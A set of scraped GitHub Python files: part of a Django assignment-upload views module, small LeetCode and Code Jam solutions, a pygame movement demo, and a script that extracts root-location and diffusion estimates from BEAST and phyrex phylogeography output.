print(exist_a_re.upload_time)\n # delete the old one\n old_student_upload.delete()\n print(exist_a_re.student_upload_instance.upload_file)\n\n # push notifications to all group members\n relations = Relationship.objects.filter(group_id=group_ins.group_id)\n for r in relations:\n if request.user.account_id == r.student_instance.account_id:\n continue\n new_notification = Notification(class_instance=group_ins.class_instance,\n sender_instance=request.user,\n receiver_instance=r.student_instance,\n group_instance=group_ins,\n status=21)\n new_notification.save()\n\n # TODO: new return\n return HttpResponseRedirect(\"/groups/class/\" + str(group_ins.class_instance.class_id))\n else:\n form = StudentUploadForm()\n return render(request, 'student_upload.html', {\n 'assign_ins': assignment_ins,\n 'form': form,\n })\n\n\ndef remove_assignment(request):\n assignment_id = request.POST.get(\"assignment_id\")\n 
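# Aside (hypothetical sketch, not this project's code): the filter().first() plus
# create-or-update branching used for AssignmentRelationship above is the pattern
# Django's update_or_create() wraps in one call:
#
#     rel, created = AssignmentRelationship.objects.update_or_create(
#         group_instance=group_ins,
#         assignment_instance=assignment_ins,
#         defaults={"student_upload_instance": student_upload},
#     )
#
# Deleting the superseded StudentUpload row would still be a separate step.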
Assignment.objects.filter(assignment_id=assignment_id).delete()\n return JsonResponse({\"data\": \"Successfully deleted assignment\"})\n\n\ndef show_assignment_detail(request, a_pk):\n \"\"\"\n render to a detail page of an assignment, where instructor can see groups with their\n uploaded files\n :param request, a_pk:\n :return:\n \"\"\"\n assignment_ins = Assignment.objects.filter(assignment_id=a_pk).first()\n if not assignment_ins:\n messages.info(request, \"No Such Class\")\n return HttpResponseRedirect(\"/explore\")\n if assignment_ins.class_instance.instructor_instance != request.user:\n messages.info(request, \"You are not the instructor of this class\")\n return HttpResponseRedirect(\"/explore\")\n\n ass_class_instance = assignment_ins.class_instance\n # get groups in this class\n groups = Group.objects.filter(class_instance=ass_class_instance)\n groups_assignment_dict = {}\n for group in groups:\n a_rel = AssignmentRelationship.objects.filter(group_instance=group,\n assignment_instance=assignment_ins).first()\n if not a_rel:\n # this group has no file for this assignment\n groups_assignment_dict[group] = False\n else:\n groups_assignment_dict[group] = a_rel\n\n return render(request, 'assignment_detail_instructor.html', {\n 'assignment_ins': assignment_ins,\n 'groups_rel_dic': groups_assignment_dict\n })\n\n\ndef show_assignment_group(request, group_pk):\n group_instance = Group.objects.filter(group_id=group_pk).first()\n if request.user.is_instructor:\n messages.info(request, \"This is for students only\")\n return HttpResponseRedirect(\"/explore\")\n if not group_instance:\n messages.info(request, \"No Such Class\")\n return HttpResponseRedirect(\"/explore\")\n relationship_instance = Relationship.objects.filter(group_id=group_pk, student_instance=request.user).first()\n if not relationship_instance:\n messages.info(request, \"You are not in that Group\")\n return HttpResponseRedirect(\"/explore\")\n\n class_instance = group_instance.class_instance\n # find all assignment for this class\n assignment_in_class = Assignment.objects.filter(class_instance=class_instance)\n assignment_group_dict = {}\n for a in assignment_in_class:\n a_rel = AssignmentRelationship.objects.filter(group_instance=group_instance,\n assignment_instance=a).first()\n if not a_rel:\n # this group has no file for this assignment\n assignment_group_dict[a] = False\n else:\n assignment_group_dict[a] = a_rel\n\n return render(request, 'assignment_in_group.html', {\n 'group_ins': group_instance,\n 'assignment_rel_dic': assignment_group_dict,\n 'time_now': timezone.now()\n })\n\n","repo_name":"beyoglubora/Squad","sub_path":"assignments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32940945347","text":"__author__ = \"Shihao Yu\"\n\"\"\"\nsource: https://leetcode.com/problems/single-number/\ndate: 2016-02-09\n----------------\nproblem:\nGiven an array of integers, every element appears twice except for one. Find that single one.\n\nNote:\nYour algorithm should have a linear runtime complexity. 
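Given the XOR identities quoted above (a ^ a = 0, plus commutativity and associativity), the whole solution collapses to a fold over the array; a quick standard-library check:

from functools import reduce
from operator import xor

print(reduce(xor, [4, 1, 2, 1, 2]))  # 4 -- paired values cancel, the singleton remains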
Could you implement it without using extra memory?\n----------------\n\nXOR:\nsince a ^ (b ^ c) = (a ^ b) ^ c,\nand a ^ b = b ^ a\nand b ^ b = 0 (a ^ b ^ b = a)\n\n\"\"\"\n\n\nclass Solution(object):\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n x = 0\n for num in nums:\n x = x ^ num\n return x\n","repo_name":"yshwaker/leetcode-solution","sub_path":"136-SingleNumber*.py","file_name":"136-SingleNumber*.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23440201661","text":"#!/usr/bin/env python\nimport sys\nimport math\n\nargv = sys.argv\nargc = len(argv)\n\ninp = argv[1]\n\ndef process_string(s):\n tokens = []\n\n sub = \"\"\n last_char = s[0]\n\n for c in s:\n if c == last_char:\n sub += c\n else:\n last_char = c\n tokens.append(sub)\n sub = str(c)\n tokens.append(sub)\n\n return tokens\n\ndef do_problem(stringA, stringB):\n if stringA == stringB:\n return 0\n\n pA = process_string(stringA)\n pB = process_string(stringB)\n\n if len(pA) != len(pB):\n return \"Fegla Won\"\n for i in range(len(pA)):\n if pA[i][0] != pB[i][0]:\n return \"Fegla Won\"\n\n actions = 0\n for i in range(len(pA)):\n actions += abs(len(pA[i]) - len(pB[i]))\n\n return actions\n\nwith open(inp) as f:\n T = int(f.readline())\n\n for i in range(T):\n N = int(f.readline())\n\n strings = [f.readline().strip() for _ in range(N)]\n answer = do_problem(strings[0], strings[1])\n\n print(\"Case #{}: \".format(i+1) + str(answer))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_142/571.py","file_name":"571.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69803928836","text":"import pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n\r\n\r\nWIDTH, HEIGHT = 1000, 800\r\nFPS = 300\r\n\r\n\r\ndef main():\r\n pygame.init()\r\n display = pygame.display.set_mode((WIDTH, HEIGHT))\r\n clock = pygame.time.Clock()\r\n\r\n player_moving_x = 0\r\n player_moving_y = 0\r\n player_speed = 5\r\n player_surf = pygame.surface.Surface((10, 10))\r\n player_surf.fill('blue')\r\n player_rect = player_surf.get_rect()\r\n player_rect.topleft = (0, 0)\r\n\r\n while True: # main loop\r\n display.fill((255, 255, 255))\r\n\r\n player_rect.x += player_moving_x\r\n player_rect.y += player_moving_y\r\n display.blit(player_surf, player_rect)\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n elif event.type == KEYUP:\r\n if event.key in (K_w, K_s):\r\n player_moving_y = 0\r\n elif event.key in (K_a, K_d):\r\n player_moving_x = 0\r\n elif event.type == KEYDOWN:\r\n if event.key == K_w:\r\n player_moving_y = -player_speed\r\n elif event.key == K_s:\r\n player_moving_y = player_speed\r\n elif event.key == K_a:\r\n player_moving_x = -player_speed\r\n elif event.key == K_d:\r\n player_moving_x = player_speed\r\n pygame.display.flip()\r\n clock.tick(FPS)\r\n\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Cynthia7979/PigeonCoding","sub_path":"Classes/[13]/wasd_demo.py","file_name":"wasd_demo.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29027455278","text":"moves = \"UDLRUDLR\"\n\ndef judgeCircle(moves: str) -> bool:\n\tx, y = 0, 0\n\n\tfor move in 
moves:\n\t\tif (move == \"U\"):\n\t\t\ty += 1\n\t\telif (move == \"D\"):\n\t\t\ty -= 1\n\t\telif (move == \"R\"):\n\t\t\tx += 1\n\t\telif (move == \"L\"):\n\t\t\tx -= 1\n\treturn (x == 0) and (y == 0)\n\nprint(f\"The Robot {'returned' if judgeCircle(moves) else 'did not return'} to the origin\")","repo_name":"Rohit5551998/LeetCode-in-Python","sub_path":"Math/Robot Return To Origin.py","file_name":"Robot Return To Origin.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20364840336","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Oct 4 2019\n\n@author: Nicola De Maio\n\"\"\"\n\nimport argparse\n#import dendropy\nimport os\nimport numpy as np\n\nN=100\n\nphyrexRootLocationIndex=21 #position of root location in phyrex output file - before was 19 and before even less\nthinPhyrex=20 #subsample from phyrex output to reduce file sizes\n\n#Check the new version of the phyrex output and create files accordingly\n\nextraAnalyses=True\nrootFiles=False\nsigmaFiles=False\nBEAST=False\nChangePhyrex=False\n\nif extraAnalyses:\n\trounds=5\n\tfor r in range(1,rounds+1):\n\t\tanalyses=[\"One sided sampling BMP, beast, round \"+str(r),\"One sided sampling BMP with extra samples, beast, round \"+str(r)]\n\t\tfoldersBEAST=[\"output/beast/sampled_gradient\"+str(r)+\"/\",\"output/c_beast/sampled_gradient\"+str(r)+\"/\"]\n\t\tfoldersRoots=[\"output/beast/sampled_gradient\"+str(r)+\"/\",\"output/c_beast/sampled_gradient\"+str(r)+\"/\"]\n\t\ttoSkip=[0,0]\n\t\ttruth=[1.0,0.0,1.0]\n\t\tfor i in range(len(analyses)):\n\t\t#for i in range(1):\n\t\t\tprint(\"\\n\")\n\t\t\tprint(analyses[i])\n\t\t\tfileX=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootX_new2.txt\",\"w\")\n\t\t\tfileY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootY_new2.txt\",\"w\")\n\t\t\t\n\t\t\tfor j in range(N):\n\t\t\t\t#if i==1:\n\t\t\t\tprint(j)\n\t\t\t\trootsX=[]\n\t\t\t\trootsY=[]\n\t\t\t\tfile=open(foldersRoots[i]+\"root_data/actual_root\"+str(j+toSkip[i])+\".txt\")\n\t\t\t\tline=file.readline()\n\t\t\t\txLoc=float(line.replace(\"\\n\",\"\"))\n\t\t\t\tline=file.readline()\n\t\t\t\tyLoc=float(line.replace(\"\\n\",\"\"))\n\t\t\t\tfile.close()\n\t\t\t\ttrueRoots=[xLoc,yLoc]\n\t\t\n\t\t\t\testimatedXRoots=[]\n\t\t\t\testimatedYRoots=[]\n\t\t\t\t#if (i<8 or i>15) and BEAST:\n\t\t\t\tfile=open(foldersBEAST[i]+\"root_data/observed_roots\"+str(j)+\".txt\")\n\t\t\t\t#print(foldersBEAST[i]+\"root_data/observed_roots\"+str(j)+\".txt\")\n\t\t\t\tline=file.readline()\n\t\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\testimatedXRoot=float(linelist[0])-trueRoots[0]\n\t\t\t\t\testimatedYRoot=float(linelist[1])-trueRoots[1]\n\t\t\t\t\testimatedXRoots.append(estimatedXRoot)\n\t\t\t\t\testimatedYRoots.append(estimatedYRoot)\n\t\t\t\t\trootsX.append(estimatedXRoot)\n\t\t\t\t\trootsY.append(estimatedYRoot)\n\t\t\t\t\tfileX.write(str(estimatedXRoot))\n\t\t\t\t\tfileY.write(str(estimatedYRoot))\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfile.close()\n\t\t\t\t#if i==1:\n\t\t\t\tprint(np.mean(rootsX))\n\t\t\t\tprint(np.std(rootsX))\n\t\t\t\tprint(np.mean(rootsY))\n\t\t\t\tprint(np.std(rootsY))\n\t\t\t\tprint(\"\")\n\t\t\tfileX.close()\n\t\t\tfileY.close()\n\t\t\t\n\t\t\tfileX=open(\"plots/\"+analyses[i].replace(\" 
\",\"_\")+\"_sigmaX.txt\",\"w\")\n\t\t\tfileCorr=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_Corr.txt\",\"w\")\n\t\t\tfileY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_sigmaY.txt\",\"w\")\n\t\t\tfor j in range(N):\n\t\t\t\tprint(j)\n\t\t\n\t\t\t\testimatedSigmaX=[]\n\t\t\t\testimatedSigmaY=[]\n\t\t\t\testimatedCov=[]\n\t\t\t\testimatedSigma=[]\n\t\t\t\testimatedCorr=[]\n\t\t\t\ttreeLs=[]\n\t\t\t\tXoverYs=[]\n\t\t\t\tfile=open(foldersBEAST[i]+\"beast_output/beast\"+str(j)+\".log.txt\")\n\t\t\t\tfor k in range(4):\n\t\t\t\t\tline=file.readline()\n\t\t\t\tlinelist=line.split()\n\t\t\t\ttreeLi=linelist.index(\"treeLength\")\n\t\t\t\tcorri=linelist.index(\"correlation\")\n\t\t\t\txi=linelist.index(\"location.varCovar.location.precision.col11\")\n\t\t\t\tyi=linelist.index(\"location.varCovar.location.precision.col22\")\n\t\t\t\tline=file.readline()\n\t\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\testimatedX=float(linelist[xi])/float(linelist[treeLi])\n\t\t\t\t\testimatedY=float(linelist[yi])/float(linelist[treeLi])\n\t\t\t\t\testimatedC2=float(linelist[corri])\n\t\t\t\t\ttreeL=float(linelist[treeLi])\n\t\t\t\t\testimatedSigmaX.append(estimatedX)\n\t\t\t\t\testimatedSigmaY.append(estimatedY)\n\t\t\t\t\testimatedCorr.append(estimatedC2)\n\t\t\t\t\ttreeLs.append(treeL)\n\t\t\t\t\tfileX.write(str(estimatedX))\n\t\t\t\t\tfileY.write(str(estimatedY))\n\t\t\t\t\tfileCorr.write(str(estimatedC2))\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tfileCorr.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfileCorr.write(\"\\n\")\n\t\t\t\tfile.close()\n\t\t\tfileX.close()\n\t\t\tfileY.close()\n\t\t\tfileCorr.close()\n\t\n\nanalyses=[\"No Bias BMP, beast\",\"Central Sampling BMP, beast\", \"Diagonal Sampling BMP, beast\", \"One sided sampling BMP, beast\", \"No Bias BMP, beast with extra samples\",\"Central Sampling BMP, beast with extra samples\", \"Diagonal Sampling BMP, beast with extra samples\", \"One sided sampling BMP, beast with extra samples\", \"Broad sampling LFV, beast\", \"Narrow sampling LFV, beast\", \"No Bias BMP, phyrex\",\"Central Sampling BMP, phyrex\", \"Diagonal Sampling BMP, phyrex\", \"One sided sampling BMP, phyrex\", \"Broad sampling LFV, phyrex\", \"Narrow sampling LFV, phyrex\", \"No Bias BMP, beast without extra samples\",\"Central Sampling BMP, beast without extra samples\", \"Diagonal Sampling BMP, beast without extra samples\", \"One sided sampling BMP, beast without extra samples\"]\nfoldersBEAST=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\", \"output/beast/LV/\",\"output/beast/LV/\",\"output/phyrex/sampled1/\",\"output/phyrex/sampled2/\",\"output/phyrex/sampled3/\",\"output/phyrex/sampled4/\", 
\"output/phyrex/LV/\",\"output/phyrex/LV/\",\"output/unc_beast/sampled1/\",\"output/unc_beast/sampled2/\",\"output/unc_beast/sampled3/\",\"output/unc_beast/sampled4/\"]\nfoldersRoots=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\",\"output/LV/\",\"output/LV/\",\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/LV/\",\"output/LV/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\"]\ntoSkip=[0,0,0,0,0,0,0,0,0,100,0,0,0,0,0,100,0,0,0,0]\n\nif rootFiles:\n\tfor i in range(len(analyses)):\n\t\tprint(\"\\n\")\n\t\tprint(analyses[i])\n\t\tif BEAST or (i>9 and i<=15):\n\t\t\tfileX=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootX_new2.txt\",\"w\")\n\t\t\tfileY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootY_new2.txt\",\"w\")\n\t\tprint(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootX.txt\")\n\t\tif i>9 and i<=15:\n\t\t\tfileX2=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootX_new3.txt\",\"w\")\n\t\t\tfileY2=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootY_new3.txt\",\"w\")\n\t\tfor j in range(N):\n\t\t\t#print(j)\n\t\t\tfile=open(foldersRoots[i]+\"root_data/actual_root\"+str(j+toSkip[i])+\".txt\")\n\t\t\tline=file.readline()\n\t\t\txLoc=float(line.replace(\"\\n\",\"\"))\n\t\t\tline=file.readline()\n\t\t\tyLoc=float(line.replace(\"\\n\",\"\"))\n\t\t\tfile.close()\n\t\t\ttrueRoots=[xLoc,yLoc]\n\t\t\n\t\t\testimatedXRoots=[]\n\t\t\testimatedYRoots=[]\n\t\t\tif (i<8 or i>15) and BEAST:\n\t\t\t\tfile=open(foldersBEAST[i]+\"root_data/observed_roots\"+str(j)+\".txt\")\n\t\t\t\t#print(foldersBEAST[i]+\"root_data/observed_roots\"+str(j)+\".txt\")\n\t\t\t\tline=file.readline()\n\t\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\testimatedXRoot=float(linelist[0])-trueRoots[0]\n\t\t\t\t\testimatedYRoot=float(linelist[1])-trueRoots[1]\n\t\t\t\t\testimatedXRoots.append(estimatedXRoot)\n\t\t\t\t\testimatedYRoots.append(estimatedYRoot)\n\t\t\t\t\tfileX.write(str(estimatedXRoot))\n\t\t\t\t\tfileY.write(str(estimatedYRoot))\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfile.close()\n\t\t\telif (i==8 or i==9) and BEAST:\n\t\t\t\tfile=open(foldersBEAST[i]+\"beast_output/beast\"+str(j+toSkip[i])+\".trees.txt\")\n\t\t\t\t#print(foldersBEAST[i]+\"beast_output/beast\"+str(j+toSkip[i])+\".trees.txt\")\n\t\t\t\tline=file.readline()\n\t\t\t\tlinelist=line.split()\n\t\t\t\twhile len(linelist)<2 or linelist[0]!=\"tree\":\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\tif line==\"\":\n\t\t\t\t\t\tbreak\n\t\t\t\twhile line!=\"\" and line!=\"\\n\" and 
len(linelist)>1:\n\t\t\t\t\t#print(line)\n\t\t\t\t\tlocs=linelist[-1].split(\"{\")[-1].replace(\"}];\",\"\")\n\t\t\t\t\testimatedXRoot=float(locs.split(\",\")[0])-trueRoots[0]\n\t\t\t\t\testimatedYRoot=float(locs.split(\",\")[1])-trueRoots[1]\n\t\t\t\t\testimatedXRoots.append(estimatedXRoot)\n\t\t\t\t\testimatedYRoots.append(estimatedYRoot)\n\t\t\t\t\tfileX.write(str(estimatedXRoot))\n\t\t\t\t\tfileY.write(str(estimatedYRoot))\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfile.close()\n\t\t\tif i>9 and i<=15:\n\t\t\t\t\tfile=open(foldersBEAST[i]+\"phyrex_output/out_new2_phyrex_stats_\"+str(j+toSkip[i])+\"_ESS.txt\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tESS=int(line.replace(\"\\n\",\"\"))\n\t\t\t\t\tfile.close()\n\t\t\t\t\tfile=open(foldersBEAST[i]+\"phyrex_output/out_new2_phyrex_stats_\"+str(j+toSkip[i])+\".txt\")\n\t\t\t\t\t#print(foldersBEAST[i]+\"phyrex_output/out_phyrex_stats_\"+str(j+toSkip[i])+\".txt\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\twhile len(linelist)<2 or linelist[0]!=\"sample\":\n\t\t\t\t\t\tline=file.readline()\n\t\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\t\tif line==\"\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\tcount=0\n\t\t\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\t\t\tcount+=1\n\t\t\t\t\t\tif count%thinPhyrex==0:\n\t\t\t\t\t\t\testimatedXRoot=float(linelist[phyrexRootLocationIndex].replace(\"f\",\"\"))-trueRoots[0]\n\t\t\t\t\t\t\testimatedYRoot=float(linelist[phyrexRootLocationIndex+1])-trueRoots[1]\n\t\t\t\t\t\t\testimatedXRoots.append(estimatedXRoot)\n\t\t\t\t\t\t\testimatedYRoots.append(estimatedYRoot)\n\t\t\t\t\t\t\tfileX.write(str(estimatedXRoot))\n\t\t\t\t\t\t\tfileY.write(str(estimatedYRoot))\n\t\t\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\t\t\tif ESS==1:\n\t\t\t\t\t\t\t\tfileX2.write(str(estimatedXRoot))\n\t\t\t\t\t\t\t\tfileY2.write(str(estimatedYRoot))\n\t\t\t\t\t\t\t\tfileX2.write(\"\\t\")\n\t\t\t\t\t\t\t\tfileY2.write(\"\\t\")\n\t\t\t\t\t\tline=file.readline()\n\t\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\tif ESS==1:\n\t\t\t\t\t\tfileX2.write(\"\\n\")\n\t\t\t\t\t\tfileY2.write(\"\\n\")\n\t\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\t\tfile.close()\n\n\n\n\n\t\t\t#print(len(estimatedXRoots))\n\t\t\t#if len(estimatedXRoots)>100:\n\t\t\t#\tprint(str(numpy.percentile(estimatedXRoots, 2.5))+\" \"+str(numpy.percentile(estimatedXRoots, 50))+\" \"+str(numpy.percentile(estimatedXRoots, 97.5)))\n\t\t\t#\tprint(str(numpy.percentile(estimatedYRoots, 2.5))+\" \"+str(numpy.percentile(estimatedYRoots, 50))+\" \"+str(numpy.percentile(estimatedYRoots, 97.5)))\n\t\t\t#else:\n\t\t\t#\tprint(\"Less than 100 samples!\")\n\t\tif BEAST or (i>9 and i<=15):\n\t\t\tfileX.close()\n\t\t\tfileY.close()\n\t\tif i>9 and i<=15:\n\t\t\tfileX2.close()\n\t\t\tfileY2.close()\n\n\n\nif sigmaFiles:\n\tif BEAST:\n\t\tanalyses=[\"No Bias BMP, beast\",\"Central Sampling BMP, beast\", \"Diagonal Sampling BMP, beast\", \"One sided sampling BMP, beast\", \"No Bias BMP, beast with extra samples\",\"Central Sampling BMP, beast with extra samples\", \"Diagonal Sampling BMP, beast with extra samples\", \"One sided sampling BMP, beast with extra samples\", \"No Bias BMP, beast without extra samples\",\"Central Sampling BMP, beast without extra samples\", \"Diagonal Sampling BMP, beast without 
extra samples\", \"One sided sampling BMP, beast without extra samples\", \"Broad sampling LFV, beast\", \"Narrow sampling LFV, beast\"]\n\t\tfoldersBEAST=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\",\"output/unc_beast/sampled1/\",\"output/unc_beast/sampled2/\",\"output/unc_beast/sampled3/\",\"output/unc_beast/sampled4/\", \"output/beast/LV/\",\"output/beast/LV/\"]\n\t\t#foldersRoots=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\",\"output/LV/\",\"output/LV/\"]\n\t\ttruth=[1.0,0.0,1.0]\n\t\ttoSkip=[0,0,0,0,0,0,0,0,0,0,0,0,0,100]\n\t\tfor i in range(len(analyses)):\n\t\t\tprint(\"\\n\")\n\t\t\tprint(analyses[i])\n\t\t\tfileX=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_sigmaX.txt\",\"w\")\n\t\t\tfileCorr=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_Corr.txt\",\"w\")\n\t\t\tfileY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_sigmaY.txt\",\"w\")\n\t\t\t#fileSigma=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_Sigma.txt\",\"w\")\n\t\t\t#fileXoverY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_XoverY.txt\",\"w\")\n\t\t\tfor j in range(N):\n\t\t\t\t#print(j)\n\t\t\n\t\t\t\testimatedSigmaX=[]\n\t\t\t\testimatedSigmaY=[]\n\t\t\t\testimatedCov=[]\n\t\t\t\testimatedSigma=[]\n\t\t\t\testimatedCorr=[]\n\t\t\t\ttreeLs=[]\n\t\t\t\tXoverYs=[]\n\t\t\t\tif i<12:\n\t\t\t\t\tfile=open(foldersBEAST[i]+\"beast_output/beast\"+str(j)+\".log.txt\")\n\t\t\t\telif i==12 or i==13:\n\t\t\t\t\tfile=open(foldersBEAST[i]+\"beast_output/beast\"+str(j+toSkip[i])+\".log.txt\")\n\t\t\t\tfor k in range(4):\n\t\t\t\t\tline=file.readline()\n\t\t\t\tlinelist=line.split()\n\t\t\t\ttreeLi=linelist.index(\"treeLength\")\n\t\t\t\tcorri=linelist.index(\"correlation\")\n\t\t\t\txi=linelist.index(\"location.varCovar.location.precision.col11\")\n\t\t\t\tyi=linelist.index(\"location.varCovar.location.precision.col22\")\n\t\t\t\t#covi=linelist.index(\"location.varCovar.location.precision.col12\")\n\t\t\t\t#diffi=linelist.index(\"location.diffusionRate\")\n\t\t\t\tline=file.readline()\n\t\t\t\twhile line!=\"\" and 
line!=\"\\n\":\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\testimatedX=float(linelist[xi])/float(linelist[treeLi])\n\t\t\t\t\testimatedY=float(linelist[yi])/float(linelist[treeLi])\n\t\t\t\t\t#estimatedC=float(linelist[covi])/float(linelist[treeLi])\n\t\t\t\t\testimatedC2=float(linelist[corri])\n\t\t\t\t\t#estimatedD=float(linelist[diffi])\n\t\t\t\t\ttreeL=float(linelist[treeLi])\n\t\t\t\t\testimatedSigmaX.append(estimatedX)\n\t\t\t\t\testimatedSigmaY.append(estimatedY)\n\t\t\t\t\t#estimatedCov.append(estimatedC)\n\t\t\t\t\testimatedCorr.append(estimatedC2)\n\t\t\t\t\t#estimatedSigma.append(estimatedD)\n\t\t\t\t\ttreeLs.append(treeL)\n\t\t\t\t\tfileX.write(str(estimatedX))\n\t\t\t\t\tfileY.write(str(estimatedY))\n\t\t\t\t\tfileCorr.write(str(estimatedC2))\n\t\t\t\t\t#fileSigma.write(str(estimatedD))\n\t\t\t\t\t#fileXoverY.write(str(estimatedX/estimatedY))\n\t\t\t\t\t#XoverYs.append(estimatedX/estimatedY)\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tfileCorr.write(\"\\t\")\n\t\t\t\t\t#fileSigma.write(\"\\t\")\n\t\t\t\t\t#fileXoverY.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfileCorr.write(\"\\n\")\n\t\t\t\t#fileSigma.write(\"\\n\")\n\t\t\t\t#fileXoverY.write(\"\\n\")\n\t\t\t\tfile.close()\n\n\t\t\t\t#print(len(estimatedSigmaX))\n\t\t\t\t#if len(estimatedSigmaX)>100:\n\t\t\t\t#\tprint(str(numpy.percentile(estimatedSigmaX, 2.5))+\" \"+str(numpy.percentile(estimatedSigmaX, 50))+\" \"+str(numpy.percentile(estimatedSigmaX, 97.5)))\n\t\t\t\t#\tprint(str(numpy.percentile(estimatedSigmaY, 2.5))+\" \"+str(numpy.percentile(estimatedSigmaY, 50))+\" \"+str(numpy.percentile(estimatedSigmaY, 97.5)))\n\t\t\t\t\t#print(str(numpy.percentile(estimatedCov, 2.5))+\" \"+str(numpy.percentile(estimatedCov, 50))+\" \"+str(numpy.percentile(estimatedCov, 97.5)))\n\t\t\t\t#\tprint(str(numpy.percentile(estimatedCorr, 2.5))+\" \"+str(numpy.percentile(estimatedCorr, 50))+\" \"+str(numpy.percentile(estimatedCorr, 97.5)))\n\t\t\t\t\t#print(str(numpy.percentile(estimatedSigma, 2.5))+\" \"+str(numpy.percentile(estimatedSigma, 50))+\" \"+str(numpy.percentile(estimatedSigma, 97.5)))\n\t\t\t\t\t#print(str(numpy.percentile(XoverYs, 2.5))+\" \"+str(numpy.percentile(XoverYs, 50))+\" \"+str(numpy.percentile(XoverYs, 